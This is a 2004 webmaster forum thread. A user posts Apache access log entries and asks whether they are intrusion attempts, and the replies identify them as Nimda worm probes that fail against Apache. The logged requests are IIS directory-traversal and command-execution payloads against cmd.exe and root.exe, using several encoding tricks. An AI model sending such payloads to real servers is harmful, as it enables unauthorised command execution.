Forum Moderators: phranque
80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:56 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:57 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
80.***.225.152 - - [18/May/2004:23:05:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
Am I mistaken into thinking that these are attempts to get (root) access to my server?
(IP shown is originating ip)
Grtz,
Marck
[edited by: tedster at 8:30 pm (utc) on May 20, 2004]
[edit reason] obscure the IPs [/edit]
As you can see, these files don't exist on Apache, and some requests are rejected as invalid.
Jim
And where/how do I see it gets rejected? (My server is running on xp...)
(I just have my server up and running for 2 weeks, so I dont know jack sh-t about all this)
Grtz,
Marck
Your log entries are classic nimda, but could also be mad by a vulnerability scanner. It they are made by a scanner, you will se a lot of other strange stuff in your entry, so rest assured, this is nimda and it cannot infect your apache.
Keep looking through your log files regularly for strange entries and react when you find them. You can always ask in forums lik this, but you would also be able to find out about them by searching in google
